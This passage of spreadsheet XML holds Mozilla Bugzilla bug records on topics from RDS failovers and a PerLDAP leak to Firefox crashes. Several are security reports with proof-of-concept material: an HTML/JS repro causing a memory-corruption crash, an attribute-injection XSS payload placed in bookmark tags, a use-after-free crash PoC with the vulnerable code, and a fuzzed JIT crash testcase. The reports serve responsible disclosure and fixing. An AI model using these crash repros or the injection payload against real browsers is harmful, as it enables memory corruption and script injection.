          <t>2017-11-13 15:22:39 -0800</t>
        </is>
      </c>
      <c r="E3924" t="n">
        <v>1</v>
      </c>
      <c r="F3924" t="n">
        <v>1</v>
      </c>
      <c r="G3924" t="n">
        <v>7</v>
      </c>
      <c r="H3924" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3924" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3924" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K3924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3924" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3924" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3924" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3924" t="inlineStr"/>
      <c r="Q3924" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3924" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3924" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3924" t="n">
        <v>1</v>
      </c>
      <c r="U3924" t="n">
        <v>0</v>
      </c>
      <c r="V3924" t="n">
        <v>3</v>
      </c>
      <c r="W3924" t="inlineStr">
        <is>
          <t>The treeherder-prod RDS instance has automatically failed over twice recently:
SourceId: treeherder-prod
Notification time : 2017-10-20 01:51:49.419
Message : Multi-AZ instance failover started
SourceId: treeherder-prod
Notification time : 2017-11-01 13:22:49.442
Message : Multi-AZ instance failover started
Neither were initiated by us, and the RDS console logs don't give any clues.
Similar to the occurrence back in March, I'll open a support ticket to find out why they occurred. (Whilst the answer might not be of much use, it's at least another nudge for them to improve the error reporting in the console.)</t>
        </is>
      </c>
      <c r="X3924" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3925">
      <c r="A3925" t="n">
        <v>1213820</v>
      </c>
      <c r="B3925" t="inlineStr">
        <is>
          <t>2015-10-12 04:54:25 -0700</t>
        </is>
      </c>
      <c r="C3925" t="inlineStr">
        <is>
          <t>can't retry an add-on installation</t>
        </is>
      </c>
      <c r="D3925" t="inlineStr">
        <is>
          <t>2015-10-26 23:42:32 -0700</t>
        </is>
      </c>
      <c r="E3925" t="n">
        <v>1</v>
      </c>
      <c r="F3925" t="n">
        <v>1</v>
      </c>
      <c r="G3925" t="n">
        <v>6</v>
      </c>
      <c r="H3925" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3925" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J3925" t="inlineStr">
        <is>
          <t>Reviewer Tools</t>
        </is>
      </c>
      <c r="K3925" t="inlineStr">
        <is>
          <t>Avenir</t>
        </is>
      </c>
      <c r="L3925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3925" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3925" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3925" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3925" t="inlineStr"/>
      <c r="Q3925" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3925" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3925" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3925" t="n">
        <v>1</v>
      </c>
      <c r="U3925" t="n">
        <v>0</v>
      </c>
      <c r="V3925" t="n">
        <v>10</v>
      </c>
      <c r="W3925" t="inlineStr">
        <is>
          <t>After one add-on installation attempt the review page insists the add-on is installed, even after I've removed the half-installed first attempt.</t>
        </is>
      </c>
      <c r="X3925" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3926">
      <c r="A3926" t="n">
        <v>1353312</v>
      </c>
      <c r="B3926" t="inlineStr">
        <is>
          <t>2017-04-04 03:13:51 -0700</t>
        </is>
      </c>
      <c r="C3926" t="inlineStr">
        <is>
          <t>logical property on pseudo-element that disallows it (e.g., border-inline-* on ::first-line) causes access violation at 0x14141414</t>
        </is>
      </c>
      <c r="D3926" t="inlineStr">
        <is>
          <t>2024-05-30 09:31:18 -0700</t>
        </is>
      </c>
      <c r="E3926" t="n">
        <v>1</v>
      </c>
      <c r="F3926" t="n">
        <v>1</v>
      </c>
      <c r="G3926" t="n">
        <v>3</v>
      </c>
      <c r="H3926" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3926" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3926" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K3926" t="inlineStr">
        <is>
          <t>54 Branch</t>
        </is>
      </c>
      <c r="L3926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3926" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3926" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3926" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3926" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main55+][adv-esr52.3+]</t>
        </is>
      </c>
      <c r="Q3926" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3926" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3926" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3926" t="n">
        <v>1</v>
      </c>
      <c r="U3926" t="n">
        <v>0</v>
      </c>
      <c r="V3926" t="n">
        <v>79</v>
      </c>
      <c r="W3926" t="inlineStr">
        <is>
          <t>Created attachment 8854374
repro.html
Repro:
&lt;html&gt;
  &lt;head&gt;
    &lt;style id=style&gt;
      * {
        float:left;
      }
      ::first-line {
        border-inline-start: 0;
      }
      .boom ::first-line {
        border: 0;
      }
    &lt;/style&gt;
    &lt;script&gt;
      onload = function() {
        document.body.className="boom";
        document.body.offsetTop;
        alert("Click OK to crash Firefox");
        document.body.className="x";
        // On x64, this causes an AV, but not on x86:
        document.body.offsetTop;
        // On x86, this code is reached. Refreshing the page appears to 
        // trigger the AV the next time the page shows the alert.
        location.reload();
      };
    &lt;/script&gt;
  &lt;/head&gt;
  &lt;body&gt;
    &lt;x&gt;x&lt;/x&gt;
  &lt;/body&gt;
&lt;/html&gt;
Applying and removing the `nsRuleNode` for class "boom" appears to cause the code to attempt to apply the `nsConditionalResetStyleData` for the `nsRuleNode` with a "border-inline-start" property. This data is corrupt in that the `nsConditionalResetStyleData::Entry` instance at index 9 of the `mEntries` property (which deals with CSS border properties) has an `mStyleStruct` member that has the value 0x14141414 (x86) or 0x14141414`14141414 (x64). This causes an AV when the code calls `nsStyleBorder::CalcDifference` with this values as its `aNewData` argument, as that code assumes it is given a pointer to a valid `nsStyleVariables` instance and attempts to access members of this object.
I've attempted to find out where this value comes from by looking at various functions in the call stack at the time of the AV, but it appears to have been created before the JavaScript that causes the AV is executed.
I've also set breakpoints on various functions that create various objects implicated in this bug, before running the repro, but my understanding of Firefox CSS internals is limited, and I was unable to find out where this value comes from and why.
I hope somebody with better understanding of how the code is supposed to work can figure out if this is some kind of "magic value" that is not being special cased correctly, or if it's a type confusion where data from a different kind of object is incorrectly interpreted as containing a pointer where it has the value seen in the crash, or something else entirely.</t>
        </is>
      </c>
      <c r="X3926" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3927">
      <c r="A3927" t="n">
        <v>1983</v>
      </c>
      <c r="B3927" t="inlineStr">
        <is>
          <t>1998-12-18 12:45:27 -0800</t>
        </is>
      </c>
      <c r="C3927" t="inlineStr">
        <is>
          <t>Memory/socket allocation problems</t>
        </is>
      </c>
      <c r="D3927" t="inlineStr">
        <is>
          <t>1999-08-09 18:47:32 -0700</t>
        </is>
      </c>
      <c r="E3927" t="n">
        <v>1</v>
      </c>
      <c r="F3927" t="n">
        <v>1</v>
      </c>
      <c r="G3927" t="n">
        <v>3</v>
      </c>
      <c r="H3927" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3927" t="inlineStr">
        <is>
          <t>Directory</t>
        </is>
      </c>
      <c r="J3927" t="inlineStr">
        <is>
          <t>PerLDAP</t>
        </is>
      </c>
      <c r="K3927" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3927" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3927" t="inlineStr">
        <is>
          <t>Solaris</t>
        </is>
      </c>
      <c r="N3927" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3927" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3927" t="inlineStr"/>
      <c r="Q3927" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3927" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S3927" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3927" t="n">
        <v>1</v>
      </c>
      <c r="U3927" t="n">
        <v>0</v>
      </c>
      <c r="V3927" t="n">
        <v>5</v>
      </c>
      <c r="W3927" t="inlineStr">
        <is>
          <t>From: Kevin Stussman &lt;stussman@ms.com&gt;
There seems to be a memory de-allocation problem with the search method
in
the Mozilla::LDAP::Conn package. My guess is that when search is called
and
a valid entry is found in LDAP, the returned blessed ref
'Mozilla::LDAP::Entry' object
does not get de-allocated (either via DESTROY or by one of your memfree
C API routines).
Here is a simple module that demostrates the problem:
------------------------------------------------------------------------
package TESTER;
use lib '/ms/user/s/stussman/2.0/Libraries/';
use Carp;
use Common qw(LDAP_HOST LDAP_PORT) ;
use Mozilla::LDAP::Conn;
use strict;
sub new
{
 my $class = shift;
 my $self = {};
 return bless $self, $class;
}
sub doit
{
 my $conn;
 $conn = new Mozilla::LDAP::Conn(LDAP_HOST,LDAP_PORT,"","","");
 croak "No Conn" unless ($conn);
 $conn-&gt;search
      (
       'o=morgan stanley',
       "subtree",
       "(uid=stussman)",
       0,
       qw(pagerphone mail objectclass)
      );
 carp "ERROR: LDAP Search Error: ".$conn-&gt;printError if
$conn-&gt;getErrorCode;
}
1;
------------------------------------------------------------------------
Notice that I do not even assign the result of the search to a variable.
This should cause the blessed ref returned by the search method to
destroy the returned Entry reference. I believe it does not.. Also, if
the filter does not
match (i.e. (uid=nosuchentry)) then the memory leak does not appear.
Here is the caller routine:
------------------------------------------------------------------------
use lib '/ms/user/s/stussman/2.0/Libraries/TEST';
use TESTER;
while(1)
{
 my $a = new TESTER;
 $a-&gt;doit();
}
------------------------------------------------------------------------
Please feel free to email me back with any questions or comments.
Regards,
Kevin Stussman
BTW, I have tried this with perl versions 5.004 through 5.005_02 and I
believe the Mozilla::LDAP::API version is 1.1</t>
        </is>
      </c>
      <c r="X3927" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3928">
      <c r="A3928" t="n">
        <v>1366420</v>
      </c>
      <c r="B3928" t="inlineStr">
        <is>
          <t>2017-05-19 17:10:52 -0700</t>
        </is>
      </c>
      <c r="C3928" t="inlineStr">
        <is>
          <t>Javascript injection / XSS in bookmark export</t>
        </is>
      </c>
      <c r="D3928" t="inlineStr">
        <is>
          <t>2018-11-05 14:01:43 -0800</t>
        </is>
      </c>
      <c r="E3928" t="n">
        <v>1</v>
      </c>
      <c r="F3928" t="n">
        <v>1</v>
      </c>
      <c r="G3928" t="n">
        <v>2</v>
      </c>
      <c r="H3928" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3928" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J3928" t="inlineStr">
        <is>
          <t>Bookmarks &amp; History</t>
        </is>
      </c>
      <c r="K3928" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3928" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3928" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3928" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3928" t="inlineStr">
        <is>
          <t>self-xss [fxsearch][adv-main57+]</t>
        </is>
      </c>
      <c r="Q3928" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3928" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3928" t="inlineStr">
        <is>
          <t>Firefox 58</t>
        </is>
      </c>
      <c r="T3928" t="n">
        <v>1</v>
      </c>
      <c r="U3928" t="n">
        <v>0</v>
      </c>
      <c r="V3928" t="n">
        <v>14</v>
      </c>
      <c r="W3928" t="inlineStr">
        <is>
          <t>Created attachment 8869635
bookmarks.html
It is possible to inject Javascript into the HTML export file of the bookmark manager via the Tags field.
To reproduce:
* Create a bookmark with a tag like " onmouseover="alert(1)" "
* Export bookmarks to HTML via bookmark manager
* open bookmarks.html file and move over the bookmark
This is almost certainly not intended and the tags should be properly escaped. I thought a while whether this would have any security implications. I couldn't come up with a realistic scenario where this matters, but one could construct less realistic scenarios (e.g. a publicly available firefox installation where the bookmarks of the users are regularly exported and uploaded to a webpage). So I'd say it's a very low severity security issue, but still should be fixed.</t>
        </is>
      </c>
      <c r="X3928" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3929">
      <c r="A3929" t="n">
        <v>516496</v>
      </c>
      <c r="B3929" t="inlineStr">
        <is>
          <t>2009-09-14 13:11:59 -0700</t>
        </is>
      </c>
      <c r="C3929" t="inlineStr">
        <is>
          <t>Add Thunderbird 3 Beta 4 to bouncer</t>
        </is>
      </c>
      <c r="D3929" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E3929" t="n">
        <v>1</v>
      </c>
      <c r="F3929" t="n">
        <v>1</v>
      </c>
      <c r="G3929" t="n">
        <v>5</v>
      </c>
      <c r="H3929" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I3929" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J3929" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K3929" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L3929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3929" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3929" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3929" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3929" t="inlineStr"/>
      <c r="Q3929" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3929" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3929" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3929" t="n">
        <v>1</v>
      </c>
      <c r="U3929" t="n">
        <v>0</v>
      </c>
      <c r="V3929" t="n">
        <v>5</v>
      </c>
      <c r="W3929" t="inlineStr">
        <is>
          <t>The Thunderbird team is going to release Thunderbird 3 Beta 4 on 22nd September 2009, and we'd like to have the main builds added to bouncer for downloads.
The relevant URLs to add are (bouncer and FTP):
http://download.mozilla.org/?product=thunderbird-3.0b4&amp;os=win&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/thunderbird/releases/3.0b4/win32/en-US/Thunderbird%20Setup%203%20Beta%204.exe
http://download.mozilla.org/?product=thunderbird-3.0b4&amp;os=linux&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/thunderbird/releases/3.0b4/linux-i686/en-US/thunderbird-3.0b4.tar.bz2
http://download.mozilla.org/?product=thunderbird-3.0b4&amp;os=osx&amp;lang=en-US
http://releases.mozilla.org/pub/mozilla.org/thunderbird/releases/3.0b4/mac/en-US/Thunderbird%203%20Beta%204.dmg
Entries for update MARs will also be needed.</t>
        </is>
      </c>
      <c r="X3929" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3930">
      <c r="A3930" t="n">
        <v>179706</v>
      </c>
      <c r="B3930" t="inlineStr">
        <is>
          <t>2002-11-12 05:54:11 -0800</t>
        </is>
      </c>
      <c r="C3930" t="inlineStr">
        <is>
          <t>activity log needs to include full account names for requestees</t>
        </is>
      </c>
      <c r="D3930" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:34 -0800</t>
        </is>
      </c>
      <c r="E3930" t="n">
        <v>1</v>
      </c>
      <c r="F3930" t="n">
        <v>1</v>
      </c>
      <c r="G3930" t="n">
        <v>4</v>
      </c>
      <c r="H3930" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3930" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3930" t="inlineStr">
        <is>
          <t>Attachments &amp; Requests</t>
        </is>
      </c>
      <c r="K3930" t="inlineStr">
        <is>
          <t>2.17.1</t>
        </is>
      </c>
      <c r="L3930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3930" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3930" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3930" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3930" t="inlineStr"/>
      <c r="Q3930" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R3930" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3930" t="inlineStr">
        <is>
          <t>Bugzilla 2.18</t>
        </is>
      </c>
      <c r="T3930" t="n">
        <v>1</v>
      </c>
      <c r="U3930" t="n">
        <v>0</v>
      </c>
      <c r="V3930" t="n">
        <v>10</v>
      </c>
      <c r="W3930" t="inlineStr">
        <is>
          <t>someone named 'timeless' just got a real review request. there are a few
accounts by that name on bmo, for timeless it's more of a record keeping problem
that a real problem. but there are 118 users found for
http://bugzilla.mozilla.org/editusers.cgi?action=list&amp;matchstr=%5Edavid%40&amp;matchtype=regexp
so when someone views the activity log for any bug where someone asked any of
those david's to review, they won't be able to find out which one was asked. 
another case: brendan's - 8 users found
http://bugzilla.mozilla.org/editusers.cgi?action=list&amp;matchstr=%5Ebrendan%40&amp;matchtype=regexp
Here's a sample bugmail:
http://bugzilla.mozilla.org/show_bug.cgi?id=113202
neil@parkwaycc.co.uk changed:
           What    |Removed                     |Added
----------------------------------------------------------------------------
  Attachment #94708|                            |review?(timeless),
here's how it appears in the bug:
neil: review? (timeless)
and in the log http://bugzilla.mozilla.org/show_activity.cgi?id=113202
neil@parkwaycc.co.uk 2002-11-12 04:36:37 Attachment #94708 Flag  
review?(timeless), superreview?(jaggernaut)</t>
        </is>
      </c>
      <c r="X3930" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3931">
      <c r="A3931" t="n">
        <v>1384278</v>
      </c>
      <c r="B3931" t="inlineStr">
        <is>
          <t>2017-07-25 13:05:19 -0700</t>
        </is>
      </c>
      <c r="C3931" t="inlineStr">
        <is>
          <t>Move metadata tables back into browser.db</t>
        </is>
      </c>
      <c r="D3931" t="inlineStr">
        <is>
          <t>2017-07-27 09:22:39 -0700</t>
        </is>
      </c>
      <c r="E3931" t="n">
        <v>1</v>
      </c>
      <c r="F3931" t="n">
        <v>1</v>
      </c>
      <c r="G3931" t="n">
        <v>2</v>
      </c>
      <c r="H3931" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I3931" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J3931" t="inlineStr">
        <is>
          <t>Data Storage</t>
        </is>
      </c>
      <c r="K3931" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3931" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M3931" t="inlineStr">
        <is>
          <t>iOS</t>
        </is>
      </c>
      <c r="N3931" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3931" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3931" t="inlineStr">
        <is>
          <t>[MobileCore][DataLoss]</t>
        </is>
      </c>
      <c r="Q3931" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3931" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3931" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3931" t="n">
        <v>1</v>
      </c>
      <c r="U3931" t="n">
        <v>0</v>
      </c>
      <c r="V3931" t="n">
        <v>5</v>
      </c>
      <c r="W3931" t="inlineStr">
        <is>
          <t>It seems that attaching a separate metadata.db for metadata storage has caused several regressions some of which are still unknown. In order to keep our sanity, we should move these tables back into browser.db.</t>
        </is>
      </c>
      <c r="X3931" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3932">
      <c r="A3932" t="n">
        <v>1525145</v>
      </c>
      <c r="B3932" t="inlineStr">
        <is>
          <t>2019-02-04 14:03:30 -0800</t>
        </is>
      </c>
      <c r="C3932" t="inlineStr">
        <is>
          <t>Use After Free In HTMLTableElment::DeleteCaption</t>
        </is>
      </c>
      <c r="D3932" t="inlineStr">
        <is>
          <t>2024-05-30 09:56:25 -0700</t>
        </is>
      </c>
      <c r="E3932" t="n">
        <v>1</v>
      </c>
      <c r="F3932" t="n">
        <v>1</v>
      </c>
      <c r="G3932" t="n">
        <v>3</v>
      </c>
      <c r="H3932" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3932" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3932" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3932" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3932" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3932" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3932" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3932" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3932" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?][post-critsmash-triage][adv-main66+][adv-esr60.6+]</t>
        </is>
      </c>
      <c r="Q3932" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3932" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3932" t="inlineStr">
        <is>
          <t>mozilla67</t>
        </is>
      </c>
      <c r="T3932" t="n">
        <v>0</v>
      </c>
      <c r="U3932" t="n">
        <v>0</v>
      </c>
      <c r="V3932" t="n">
        <v>28</v>
      </c>
      <c r="W3932" t="inlineStr">
        <is>
          <t>Created attachment 9041302
crash.html
I found a use after free by code review and have wrote a crashing proof of concept. Also there are at least two other use after frees in the same class. The problem is a raw pointer to a caption element is obtained. Its then passed to RemoveChild() which dispatches a sync DOMNodeRemoved event. I've attached a simple proof of concept. Wait for the page to load and then mouse over the table. Click the alert box and firefox should crash. This like pretty old code so I bet most versions of firefox are effected. Also there are at least two other use after frees in that file. I'll open up separate bug reports for those. It could be modified to where you don't have to mouse over the table to and click the alert box to trigger to the bug but I've worked so long and hard to try and find a bug and I finally found one so I'm reporting it ASAP!. In order to fix this issue I would recommend taking a strong reference to the caption object so it cant be removed.
HTMLTableElement::DeleteCaption()
{
  HTMLTableCaptionElement* caption = GetCaption();
  if (caption) {
    mozilla::ErrorResult rv;
    nsINode::RemoveChild(*caption, rv);
    MOZ_ASSERT(!rv.Failed());
  }
}</t>
        </is>
      </c>
      <c r="X3932" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3933">
      <c r="A3933" t="n">
        <v>1062825</v>
      </c>
      <c r="B3933" t="inlineStr">
        <is>
          <t>2014-09-04 04:31:31 -0700</t>
        </is>
      </c>
      <c r="C3933" t="inlineStr">
        <is>
          <t>Logviewer: Page title should include job details to make tabs recognisable</t>
        </is>
      </c>
      <c r="D3933" t="inlineStr">
        <is>
          <t>2015-06-01 15:54:46 -0700</t>
        </is>
      </c>
      <c r="E3933" t="n">
        <v>1</v>
      </c>
      <c r="F3933" t="n">
        <v>1</v>
      </c>
      <c r="G3933" t="n">
        <v>7</v>
      </c>
      <c r="H3933" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I3933" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J3933" t="inlineStr">
        <is>
          <t>Treeherder</t>
        </is>
      </c>
      <c r="K3933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L3933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3933" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3933" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3933" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3933" t="inlineStr"/>
      <c r="Q3933" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3933" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3933" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3933" t="n">
        <v>1</v>
      </c>
      <c r="U3933" t="n">
        <v>0</v>
      </c>
      <c r="V3933" t="n">
        <v>9</v>
      </c>
      <c r="W3933" t="inlineStr">
        <is>
          <t>The log viewer page title is always:
"Treeherder Log Viewer"
We should make it include details about the job, so multiple open tabs can be differentiated.
eg: Log viewer - &lt;job type/platform&gt; - &lt;repo or timestamp or something&gt;</t>
        </is>
      </c>
      <c r="X3933" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3934">
      <c r="A3934" t="n">
        <v>999759</v>
      </c>
      <c r="B3934" t="inlineStr">
        <is>
          <t>2014-04-22 16:06:44 -0700</t>
        </is>
      </c>
      <c r="C3934" t="inlineStr">
        <is>
          <t>Crash [@ js::jit::IonBailoutIterator::IonBailoutIterator]</t>
        </is>
      </c>
      <c r="D3934" t="inlineStr">
        <is>
          <t>2015-08-30 12:12:16 -0700</t>
        </is>
      </c>
      <c r="E3934" t="n">
        <v>1</v>
      </c>
      <c r="F3934" t="n">
        <v>1</v>
      </c>
      <c r="G3934" t="n">
        <v>3</v>
      </c>
      <c r="H3934" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3934" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3934" t="inlineStr">
        <is>
          <t>JavaScript Engine: JIT</t>
        </is>
      </c>
      <c r="K3934" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3934" t="inlineStr">
        <is>
          <t>ARM</t>
        </is>
      </c>
      <c r="M3934" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3934" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3934" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3934" t="inlineStr">
        <is>
          <t>[jsbugmon:]</t>
        </is>
      </c>
      <c r="Q3934" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3934" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3934" t="inlineStr">
        <is>
          <t>mozilla32</t>
        </is>
      </c>
      <c r="T3934" t="n">
        <v>1</v>
      </c>
      <c r="U3934" t="n">
        <v>0</v>
      </c>
      <c r="V3934" t="n">
        <v>16</v>
      </c>
      <c r="W3934" t="inlineStr">
        <is>
          <t>Created attachment 8410614
stack
function f(f, inputs) {
    for (var j = 0; j &lt; inputs.length; ++j) {
        for (var k = 0; k &lt; inputs.length; ++k) {
            try {
                f(inputs[j], inputs[k]);
            } catch (e) {}
        }
    }
}
s = newGlobal()
s["f"] = this["f"].bind(this)
evalcx("\
    function f1() {\
        __defineSetter__(\"e\", function(x) {\
            this[\"__proto__\"] = x\
        })\
    }\
    f(f1, [0]);\
    e = Proxy.createFunction((function() {\
        return {\
            has: function() {}\
        }\
    })()\
    , function(){}\
    );\
    f2 = (function() {});\
    setJitCompilerOption('ion.usecount.trigger', 0);\
    f3 = (function(x, y) {\
        return ((-y * ((((!(x &gt;&gt;&gt; 0)) &gt;&gt;&gt; 0) + \
            (((Math.fround(Math.fround(Math.fround(x))) &gt;&gt;&gt; 0) &lt;&lt; \
            (y | 0)) | 0)) | 0)) &gt;&gt;&gt; 0) * \
            Math.pow(((x | 0) | 0), f2(x, +(d(l(0xf, -E)))))\
    });\
    f(f3, [-0, Math.PI, -Number])\
", s)
crashes js opt shell on m-c changeset c962bde5ac0b with --baseline-eager --ion-parallel-compile=off --ion-gvn=pessimistic --ion-check-range-analysis at js::jit::IonBailoutIterator::IonBailoutIterator on an ARM ODROID board with Ubuntu 14.04.
My configure flags are:
